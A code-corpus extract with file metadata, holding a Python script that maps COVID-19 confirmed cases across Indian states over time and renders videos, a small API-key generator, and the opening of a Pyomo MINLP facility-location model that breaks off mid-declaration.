| 0
| 0.037909
| 0.069979
| 1,872
| 52
| 107
| 36
| 0.789776
| 0.209402
| 0
| 0.785714
| 0
| 0
| 0.168136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.047619
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81dea810f1e07b5dacb2854b8d5697b9bb0990bb
| 7,736
|
py
|
Python
|
time_map.py
|
SriyaR/Coronavirus-Time-Space-Spread-India
|
6b78ff1541cb60f209423a2c06e97b368c238614
|
[
"CC0-1.0"
] | null | null | null |
time_map.py
|
SriyaR/Coronavirus-Time-Space-Spread-India
|
6b78ff1541cb60f209423a2c06e97b368c238614
|
[
"CC0-1.0"
] | null | null | null |
time_map.py
|
SriyaR/Coronavirus-Time-Space-Spread-India
|
6b78ff1541cb60f209423a2c06e97b368c238614
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""time-map.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1-2jgIeLZg107TIwVKDXWfjL07ddYnLuP
"""
import cv2
import os
import json
import matplotlib.pyplot as plt
import matplotlib.cm
from mpl_toolkits.basemap import Basemap
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
from matplotlib.colors import Normalize
import numpy as np
from matplotlib.colors import rgb2hex, Normalize
from matplotlib.cm import ScalarMappable
from matplotlib.colorbar import ColorbarBase
import matplotlib.animation as animation
with open('INDIA/data.json') as json_file:
data = json.load(json_file)
#Color bar depends on Confirmed Cases on that Day
folder = "IMAGES"
for ind in range(len(data['data'])):
color_dict = {}
color_list = ["Andaman and Nicobar","Andhra Pradesh","Arunachal Pradesh","Assam","Bihar","Chandigarh","Chhattisgarh","Dadra and Nagar Haveli","Daman and Diu","Delhi","Goa","Gujarat","Haryana","Himachal Pradesh","Jammu and Kashmir","Jharkhand","Karnataka","Kerala","Lakshadweep","Madhya Pradesh","Maharashtra","Manipur","Meghalaya","Mizoram","Nagaland","Orissa","Puducherry","Punjab","Rajasthan","Sikkim","Tamil Nadu","Telengana","Tripura","Uttar Pradesh","Uttaranchal","West Bengal",]
for j in range(len(data['data'][ind]['regional'])):
color_dict[data['data'][ind]['regional'][j]['loc']] = data['data'][ind]['regional'][j]['totalConfirmed']
for j in color_list:
if j not in color_dict.keys():
color_dict[j] = 0
#As our coordinates do not incorporate seperation of Ladakh from Jammu & Kashmir
color_dict["Jammu and Kashmir"] += color_dict["Ladakh"]
del color_dict["Ladakh"]
fig, ax = plt.subplots()
#Obtain position coordinates from https://boundingbox.klokantech.com/
m = Basemap(resolution='c',projection='merc',lat_0=54.5,lon_0=-4.36,llcrnrlon=68., llcrnrlat=6., urcrnrlat=37., urcrnrlon=97.)
m.drawmapboundary(fill_color='#46bcec')
m.fillcontinents(color='#f2f2f2', lake_color='#46bcec')
m.drawcoastlines()
#contains all state position coordinates
m.readshapefile("INDIA/IND_adm1","INDIA")
colors={}
statenames=[]
patches = []
#Colormap
cmap = plt.cm.Reds
#Colorbar Range
vmin = min(color_dict.values()); vmax = max(color_dict.values())
norm = Normalize(vmin=vmin, vmax=vmax)
# color mapper to covert values to colors
mapper = ScalarMappable(norm=norm, cmap=cmap)
for shapedict in m.INDIA_info:
statename = shapedict['NAME_1']
#To incorporate difference between Map State Name and Data Loc Name
if statename == "Telangana":
statename = "Telengana"
if statename in color_dict:
pop = color_dict[statename]
colors[statename] = mapper.to_rgba(pop)
statenames.append(statename)
for nshape,seg in enumerate(m.INDIA):
color = rgb2hex(colors[statenames[nshape]])
poly = Polygon(seg,facecolor=color,edgecolor=color)
ax.add_patch(poly)
plt.title('Confirmed Cases on '+ data['data'][ind]['day'])
cax = fig.add_axes([0.27, 0.1, 0.5, 0.05]) # posititon
cb = ColorbarBase(cax,cmap=cmap,norm=norm, orientation='horizontal')
cb.ax.set_xlabel('Number of Cases')
fig1 = plt.gcf()
plt.show()
fig1.savefig(folder + "/file%02d.png" % ind)
video_name = 'time_map.avi'
images = [img for img in os.listdir(folder) if img.endswith(".png")]
frame = cv2.imread(os.path.join(folder, images[0]))
height, width, layers = frame.shape
#0.7 is the fps (frame per second)
video = cv2.VideoWriter(video_name, 0, 0.7, (width,height))
for image in sorted(images):
video.write(cv2.imread(os.path.join(folder, image)))
cv2.destroyAllWindows()
video.release()
#With Uniform colorbar across images
index = len(data['data'])-1
color_dict_last = {}
color_list = ["Andaman and Nicobar","Andhra Pradesh","Arunachal Pradesh","Assam","Bihar","Chandigarh","Chhattisgarh","Dadra and Nagar Haveli","Daman and Diu","Delhi","Goa","Gujarat","Haryana","Himachal Pradesh","Jammu and Kashmir","Jharkhand","Karnataka","Kerala","Lakshadweep","Madhya Pradesh","Maharashtra","Manipur","Meghalaya","Mizoram","Nagaland","Orissa","Puducherry","Punjab","Rajasthan","Sikkim","Tamil Nadu","Telengana","Tripura","Uttar Pradesh","Uttaranchal","West Bengal",]
for j in range(len(data['data'][index]['regional'])):
color_dict_last[data['data'][index]['regional'][j]['loc']] = data['data'][index]['regional'][j]['totalConfirmed']
for j in color_list:
if j not in color_dict_last.keys():
color_dict_last[j] = 0
#As our coordinates do not incorporate seperation of Ladakh from Jammu & Kashmir
color_dict_last["Jammu and Kashmir"] += color_dict_last["Ladakh"]
del color_dict_last["Ladakh"]
folder = "IMAGES_UNIFORM"
for ind in range(len(data['data'])):
color_dict = {}
color_list = ["Andaman and Nicobar","Andhra Pradesh","Arunachal Pradesh","Assam","Bihar","Chandigarh","Chhattisgarh","Dadra and Nagar Haveli","Daman and Diu","Delhi","Goa","Gujarat","Haryana","Himachal Pradesh","Jammu and Kashmir","Jharkhand","Karnataka","Kerala","Lakshadweep","Madhya Pradesh","Maharashtra","Manipur","Meghalaya","Mizoram","Nagaland","Orissa","Puducherry","Punjab","Rajasthan","Sikkim","Tamil Nadu","Telengana","Tripura","Uttar Pradesh","Uttaranchal","West Bengal",]
for j in range(len(data['data'][ind]['regional'])):
color_dict[data['data'][ind]['regional'][j]['loc']] = data['data'][ind]['regional'][j]['totalConfirmed']
for j in color_list:
if j not in color_dict.keys():
color_dict[j] = 0
#As our coordinates do not incorporate seperation of Ladakh from Jammu & Kashmir
color_dict["Jammu and Kashmir"] += color_dict["Ladakh"]
del color_dict["Ladakh"]
fig, ax = plt.subplots()
#Obtain position coordinates from https://boundingbox.klokantech.com/
m = Basemap(resolution='c',projection='merc',lat_0=54.5,lon_0=-4.36,llcrnrlon=68., llcrnrlat=6., urcrnrlat=37., urcrnrlon=97.)
m.drawmapboundary(fill_color='#46bcec')
m.fillcontinents(color='#f2f2f2', lake_color='#46bcec')
m.drawcoastlines()
#contains all state position coordinates
m.readshapefile("IND_adm1","INDIA")
colors={}
statenames=[]
patches = []
#Reversed Color Map
cmap = plt.cm.get_cmap('hot_r')
vmin = min(color_dict.values()); vmax = max(color_dict_last.values())
#Colorbar Range
norm = Normalize(vmin=vmin, vmax=vmax)
# color mapper to covert values to colors
mapper = ScalarMappable(norm=norm, cmap=cmap)
for shapedict in m.INDIA_info:
statename = shapedict['NAME_1']
#To incorporate difference between Map State Name and Data Loc Name
if statename == "Telangana":
statename = "Telengana"
if statename in color_dict:
pop = color_dict[statename]
colors[statename] = mapper.to_rgba(pop)
statenames.append(statename)
for nshape,seg in enumerate(m.INDIA):
color = rgb2hex(colors[statenames[nshape]])
poly = Polygon(seg,facecolor=color,edgecolor=color)
ax.add_patch(poly)
plt.title('Confirmed Cases on '+ data['data'][ind]['day'])
cax = fig.add_axes([0.27, 0.1, 0.5, 0.05]) # posititon
cb = ColorbarBase(cax,cmap=cmap,norm=norm, orientation='horizontal')
cb.ax.set_xlabel('Number of Cases')
fig1 = plt.gcf()
plt.show()
fig1.savefig(folder + "/file%02d.png" % ind)
video_name = 'time_map_uniform.avi'
images = [img for img in os.listdir(folder) if img.endswith(".png")]
frame = cv2.imread(os.path.join(folder, images[0]))
height, width, layers = frame.shape
video = cv2.VideoWriter(video_name, 0, 1, (width,height))
for image in sorted(images):
video.write(cv2.imread(os.path.join(folder, image)))
cv2.destroyAllWindows()
video.release()
| 42.740331
| 486
| 0.708635
| 1,059
| 7,736
| 5.102927
| 0.237016
| 0.048298
| 0.016284
| 0.021095
| 0.826055
| 0.814582
| 0.790896
| 0.790896
| 0.790896
| 0.776832
| 0
| 0.016232
| 0.13198
| 7,736
| 181
| 487
| 42.740331
| 0.788533
| 0.134436
| 0
| 0.723077
| 1
| 0
| 0.252024
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.107692
| 0
| 0.107692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1eebc44279b5e679d8ef84689ed368209507456d
| 122
|
py
|
Python
|
news/utils.py
|
yxor/neonews
|
34a506fcc4084f9d37b98801d260fca09582fed3
|
[
"MIT"
] | 3
|
2020-12-17T00:52:17.000Z
|
2021-08-06T15:22:03.000Z
|
news/utils.py
|
yxor/neonews
|
34a506fcc4084f9d37b98801d260fca09582fed3
|
[
"MIT"
] | null | null | null |
news/utils.py
|
yxor/neonews
|
34a506fcc4084f9d37b98801d260fca09582fed3
|
[
"MIT"
] | 1
|
2021-02-16T19:22:13.000Z
|
2021-02-16T19:22:13.000Z
|
""" a file with with utility functions """
import secrets
def generate_api_key():
return secrets.token_urlsafe(16)
| 15.25
| 42
| 0.729508
| 17
| 122
| 5.058824
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019802
| 0.172131
| 122
| 7
| 43
| 17.428571
| 0.831683
| 0.278689
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
484558a71b238b996f17ec28e2d1d8c35614cfc9
| 173,889
|
py
|
Python
|
tests/examples/minlplib/sfacloc1_4_80.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | 2
|
2021-07-03T13:19:10.000Z
|
2022-02-06T10:48:13.000Z
|
tests/examples/minlplib/sfacloc1_4_80.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | 1
|
2021-07-04T14:52:14.000Z
|
2021-07-15T10:17:11.000Z
|
tests/examples/minlplib/sfacloc1_4_80.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | null | null | null |
# MINLP written by GAMS Convert at 04/21/18 13:54:10
#
# Equation counts
# Total E G L N X C B
# 2235 106 2110 19 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 356 294 62 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 8025 7890 135 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x2 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x3 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x4 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x5 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x6 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x7 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x8 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x9 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x10 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x11 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x12 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x13 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x14 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x15 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x16 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x17 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x18 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x19 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x20 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x21 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x22 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x23 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x24 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x25 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x26 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x27 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x28 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x29 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x30 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x31 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x32 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x33 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x34 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x35 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x36 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x37 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x38 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x39 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x40 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x41 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x42 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x43 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x44 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x45 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x46 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x47 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x48 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x49 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x50 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x51 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x52 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x53 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x54 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x55 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x56 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x57 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x58 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x59 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x60 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x61 = Var(within=Reals,bounds=(0,0.26351883),initialize=0)
m.x62 = Var(within=Reals,bounds=(0,0.26351883),initialize=0)
m.x63 = Var(within=Reals,bounds=(0,0.26351883),initialize=0)
m.x64 = Var(within=Reals,bounds=(0,0.26351883),initialize=0)
m.x65 = Var(within=Reals,bounds=(0,0.22891574),initialize=0)
m.x66 = Var(within=Reals,bounds=(0,0.22891574),initialize=0)
m.x67 = Var(within=Reals,bounds=(0,0.22891574),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,0.22891574),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,0.21464835),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,0.21464835),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,0.21464835),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,0.21464835),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,0.17964414),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,0.17964414),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,0.17964414),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,0.17964414),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,0.17402843),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,0.17402843),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,0.17402843),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,0.17402843),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,0.15355962),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,0.15355962),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,0.15355962),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,0.15355962),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,0.1942283),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,0.1942283),initialize=0)
m.x87 = Var(within=Reals,bounds=(0,0.1942283),initialize=0)
m.x88 = Var(within=Reals,bounds=(0,0.1942283),initialize=0)
m.x89 = Var(within=Reals,bounds=(0,0.25670555),initialize=0)
m.x90 = Var(within=Reals,bounds=(0,0.25670555),initialize=0)
m.x91 = Var(within=Reals,bounds=(0,0.25670555),initialize=0)
m.x92 = Var(within=Reals,bounds=(0,0.25670555),initialize=0)
m.x93 = Var(within=Reals,bounds=(0,0.27088619),initialize=0)
m.x94 = Var(within=Reals,bounds=(0,0.27088619),initialize=0)
m.x95 = Var(within=Reals,bounds=(0,0.27088619),initialize=0)
m.x96 = Var(within=Reals,bounds=(0,0.27088619),initialize=0)
m.x97 = Var(within=Reals,bounds=(0,0.28985675),initialize=0)
m.x98 = Var(within=Reals,bounds=(0,0.28985675),initialize=0)
m.x99 = Var(within=Reals,bounds=(0,0.28985675),initialize=0)
m.x100 = Var(within=Reals,bounds=(0,0.28985675),initialize=0)
m.x101 = Var(within=Reals,bounds=(0,0.25550303),initialize=0)
m.x102 = Var(within=Reals,bounds=(0,0.25550303),initialize=0)
m.x103 = Var(within=Reals,bounds=(0,0.25550303),initialize=0)
m.x104 = Var(within=Reals,bounds=(0,0.25550303),initialize=0)
m.x105 = Var(within=Reals,bounds=(0,0.19001726),initialize=0)
m.x106 = Var(within=Reals,bounds=(0,0.19001726),initialize=0)
m.x107 = Var(within=Reals,bounds=(0,0.19001726),initialize=0)
m.x108 = Var(within=Reals,bounds=(0,0.19001726),initialize=0)
m.x109 = Var(within=Reals,bounds=(0,0.23803143),initialize=0)
m.x110 = Var(within=Reals,bounds=(0,0.23803143),initialize=0)
m.x111 = Var(within=Reals,bounds=(0,0.23803143),initialize=0)
m.x112 = Var(within=Reals,bounds=(0,0.23803143),initialize=0)
m.x113 = Var(within=Reals,bounds=(0,0.23312962),initialize=0)
m.x114 = Var(within=Reals,bounds=(0,0.23312962),initialize=0)
m.x115 = Var(within=Reals,bounds=(0,0.23312962),initialize=0)
m.x116 = Var(within=Reals,bounds=(0,0.23312962),initialize=0)
m.x117 = Var(within=Reals,bounds=(0,0.27705307),initialize=0)
m.x118 = Var(within=Reals,bounds=(0,0.27705307),initialize=0)
m.x119 = Var(within=Reals,bounds=(0,0.27705307),initialize=0)
m.x120 = Var(within=Reals,bounds=(0,0.27705307),initialize=0)
m.x121 = Var(within=Reals,bounds=(0,2.02),initialize=0)
m.x122 = Var(within=Reals,bounds=(0,4.01333333333333),initialize=0)
m.x123 = Var(within=Reals,bounds=(0,4.76),initialize=0)
m.x124 = Var(within=Reals,bounds=(0,5.96),initialize=0)
m.x125 = Var(within=Reals,bounds=(0,42.0933333333333),initialize=0)
m.x126 = Var(within=Reals,bounds=(0,99.28),initialize=0)
m.x127 = Var(within=Reals,bounds=(0,6.59333333333333),initialize=0)
m.x128 = Var(within=Reals,bounds=(0,61.8666666666667),initialize=0)
m.x129 = Var(within=Reals,bounds=(0,56.2866666666667),initialize=0)
m.x130 = Var(within=Reals,bounds=(0,41.5),initialize=0)
m.x131 = Var(within=Reals,bounds=(0,62.4933333333333),initialize=0)
m.x132 = Var(within=Reals,bounds=(0,80.9066666666667),initialize=0)
m.x133 = Var(within=Reals,bounds=(0,26.1466666666667),initialize=0)
m.x134 = Var(within=Reals,bounds=(0,38),initialize=0)
m.x135 = Var(within=Reals,bounds=(0,62.24),initialize=0)
m.x136 = Var(within=Reals,bounds=(0,0.5323080366),initialize=0)
m.x137 = Var(within=Reals,bounds=(0,0.918715169866666),initialize=0)
m.x138 = Var(within=Reals,bounds=(0,1.021726146),initialize=0)
m.x139 = Var(within=Reals,bounds=(0,1.0706790744),initialize=0)
m.x140 = Var(within=Reals,bounds=(0,7.32543671346667),initialize=0)
m.x141 = Var(within=Reals,bounds=(0,15.2453990736),initialize=0)
m.x142 = Var(within=Reals,bounds=(0,1.28061192466667),initialize=0)
m.x143 = Var(within=Reals,bounds=(0,15.8815166933333),initialize=0)
m.x144 = Var(within=Reals,bounds=(0,15.2472806811333),initialize=0)
m.x145 = Var(within=Reals,bounds=(0,12.029055125),initialize=0)
m.x146 = Var(within=Reals,bounds=(0,15.9672360214667),initialize=0)
m.x147 = Var(within=Reals,bounds=(0,15.3736631157333),initialize=0)
m.x148 = Var(within=Reals,bounds=(0,6.2237284564),initialize=0)
m.x149 = Var(within=Reals,bounds=(0,8.85892556),initialize=0)
m.x150 = Var(within=Reals,bounds=(0,17.2437830768),initialize=0)
m.x151 = Var(within=Reals,bounds=(0.25788969,0.35227087),initialize=0.25788969)
m.x152 = Var(within=Reals,bounds=(0.25788969,0.35227087),initialize=0.25788969)
m.x153 = Var(within=Reals,bounds=(0.25788969,0.35227087),initialize=0.25788969)
m.x154 = Var(within=Reals,bounds=(0.25788969,0.35227087),initialize=0.25788969)
m.x155 = Var(within=Reals,bounds=(-0.98493628,-0.7794471),initialize=-0.7794471)
m.x156 = Var(within=Reals,bounds=(-0.98493628,-0.7794471),initialize=-0.7794471)
m.x157 = Var(within=Reals,bounds=(-0.98493628,-0.7794471),initialize=-0.7794471)
m.x158 = Var(within=Reals,bounds=(-0.98493628,-0.7794471),initialize=-0.7794471)
m.x159 = Var(within=Reals,bounds=(0,0.0580296499999999),initialize=0)
m.x160 = Var(within=Reals,bounds=(0,0.0580296499999999),initialize=0)
m.x161 = Var(within=Reals,bounds=(0,0.0580296499999999),initialize=0)
m.x162 = Var(within=Reals,bounds=(0,0.0580296499999999),initialize=0)
m.x163 = Var(within=Reals,bounds=(0,0.0546689399999999),initialize=0)
m.x164 = Var(within=Reals,bounds=(0,0.0546689399999999),initialize=0)
m.x165 = Var(within=Reals,bounds=(0,0.0546689399999999),initialize=0)
m.x166 = Var(within=Reals,bounds=(0,0.0546689399999999),initialize=0)
m.x167 = Var(within=Reals,bounds=(0,0.09360565),initialize=0)
m.x168 = Var(within=Reals,bounds=(0,0.09360565),initialize=0)
m.x169 = Var(within=Reals,bounds=(0,0.09360565),initialize=0)
m.x170 = Var(within=Reals,bounds=(0,0.09360565),initialize=0)
m.x171 = Var(within=Reals,bounds=(0,0.0476880399999999),initialize=0)
m.x172 = Var(within=Reals,bounds=(0,0.0476880399999999),initialize=0)
m.x173 = Var(within=Reals,bounds=(0,0.0476880399999999),initialize=0)
m.x174 = Var(within=Reals,bounds=(0,0.0476880399999999),initialize=0)
m.x175 = Var(within=Reals,bounds=(0,0.05276021),initialize=0)
m.x176 = Var(within=Reals,bounds=(0,0.05276021),initialize=0)
m.x177 = Var(within=Reals,bounds=(0,0.05276021),initialize=0)
m.x178 = Var(within=Reals,bounds=(0,0.05276021),initialize=0)
m.x179 = Var(within=Reals,bounds=(0,0.04905388),initialize=0)
m.x180 = Var(within=Reals,bounds=(0,0.04905388),initialize=0)
m.x181 = Var(within=Reals,bounds=(0,0.04905388),initialize=0)
m.x182 = Var(within=Reals,bounds=(0,0.04905388),initialize=0)
m.x183 = Var(within=Reals,bounds=(0,0.07731692),initialize=0)
m.x184 = Var(within=Reals,bounds=(0,0.07731692),initialize=0)
m.x185 = Var(within=Reals,bounds=(0,0.07731692),initialize=0)
m.x186 = Var(within=Reals,bounds=(0,0.07731692),initialize=0)
m.x187 = Var(within=Reals,bounds=(0,0.08211741),initialize=0)
m.x188 = Var(within=Reals,bounds=(0,0.08211741),initialize=0)
m.x189 = Var(within=Reals,bounds=(0,0.08211741),initialize=0)
m.x190 = Var(within=Reals,bounds=(0,0.08211741),initialize=0)
m.x191 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x192 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x193 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x194 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x195 = Var(within=Reals,bounds=(0,0.08436757),initialize=0)
m.x196 = Var(within=Reals,bounds=(0,0.08436757),initialize=0)
m.x197 = Var(within=Reals,bounds=(0,0.08436757),initialize=0)
m.x198 = Var(within=Reals,bounds=(0,0.08436757),initialize=0)
m.x199 = Var(within=Reals,bounds=(0,0.06987597),initialize=0)
m.x200 = Var(within=Reals,bounds=(0,0.06987597),initialize=0)
m.x201 = Var(within=Reals,bounds=(0,0.06987597),initialize=0)
m.x202 = Var(within=Reals,bounds=(0,0.06987597),initialize=0)
m.x203 = Var(within=Reals,bounds=(0,0.04788831),initialize=0)
m.x204 = Var(within=Reals,bounds=(0,0.04788831),initialize=0)
m.x205 = Var(within=Reals,bounds=(0,0.04788831),initialize=0)
m.x206 = Var(within=Reals,bounds=(0,0.04788831),initialize=0)
m.x207 = Var(within=Reals,bounds=(0,0.0668875099999999),initialize=0)
m.x208 = Var(within=Reals,bounds=(0,0.0668875099999999),initialize=0)
m.x209 = Var(within=Reals,bounds=(0,0.0668875099999999),initialize=0)
m.x210 = Var(within=Reals,bounds=(0,0.0668875099999999),initialize=0)
m.x211 = Var(within=Reals,bounds=(0,0.07276512),initialize=0)
m.x212 = Var(within=Reals,bounds=(0,0.07276512),initialize=0)
m.x213 = Var(within=Reals,bounds=(0,0.07276512),initialize=0)
m.x214 = Var(within=Reals,bounds=(0,0.07276512),initialize=0)
m.x215 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x216 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x217 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x218 = Var(within=Reals,bounds=(0,0.09438118),initialize=0)
m.x219 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x220 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x221 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x222 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x223 = Var(within=Reals,bounds=(0,0.1742468),initialize=0)
m.x224 = Var(within=Reals,bounds=(0,0.1742468),initialize=0)
m.x225 = Var(within=Reals,bounds=(0,0.1742468),initialize=0)
m.x226 = Var(within=Reals,bounds=(0,0.1742468),initialize=0)
m.x227 = Var(within=Reals,bounds=(0,0.1210427),initialize=0)
m.x228 = Var(within=Reals,bounds=(0,0.1210427),initialize=0)
m.x229 = Var(within=Reals,bounds=(0,0.1210427),initialize=0)
m.x230 = Var(within=Reals,bounds=(0,0.1210427),initialize=0)
m.x231 = Var(within=Reals,bounds=(0,0.1319561),initialize=0)
m.x232 = Var(within=Reals,bounds=(0,0.1319561),initialize=0)
m.x233 = Var(within=Reals,bounds=(0,0.1319561),initialize=0)
m.x234 = Var(within=Reals,bounds=(0,0.1319561),initialize=0)
m.x235 = Var(within=Reals,bounds=(0,0.12126822),initialize=0)
m.x236 = Var(within=Reals,bounds=(0,0.12126822),initialize=0)
m.x237 = Var(within=Reals,bounds=(0,0.12126822),initialize=0)
m.x238 = Var(within=Reals,bounds=(0,0.12126822),initialize=0)
m.x239 = Var(within=Reals,bounds=(0,0.10450574),initialize=0)
m.x240 = Var(within=Reals,bounds=(0,0.10450574),initialize=0)
m.x241 = Var(within=Reals,bounds=(0,0.10450574),initialize=0)
m.x242 = Var(within=Reals,bounds=(0,0.10450574),initialize=0)
m.x243 = Var(within=Reals,bounds=(0,0.11691138),initialize=0)
m.x244 = Var(within=Reals,bounds=(0,0.11691138),initialize=0)
m.x245 = Var(within=Reals,bounds=(0,0.11691138),initialize=0)
m.x246 = Var(within=Reals,bounds=(0,0.11691138),initialize=0)
m.x247 = Var(within=Reals,bounds=(0,0.17458814),initialize=0)
m.x248 = Var(within=Reals,bounds=(0,0.17458814),initialize=0)
m.x249 = Var(within=Reals,bounds=(0,0.17458814),initialize=0)
m.x250 = Var(within=Reals,bounds=(0,0.17458814),initialize=0)
m.x251 = Var(within=Reals,bounds=(0,0.17650501),initialize=0)
m.x252 = Var(within=Reals,bounds=(0,0.17650501),initialize=0)
m.x253 = Var(within=Reals,bounds=(0,0.17650501),initialize=0)
m.x254 = Var(within=Reals,bounds=(0,0.17650501),initialize=0)
m.x255 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x256 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x257 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x258 = Var(within=Reals,bounds=(0,0.20548918),initialize=0)
m.x259 = Var(within=Reals,bounds=(0,0.18562706),initialize=0)
m.x260 = Var(within=Reals,bounds=(0,0.18562706),initialize=0)
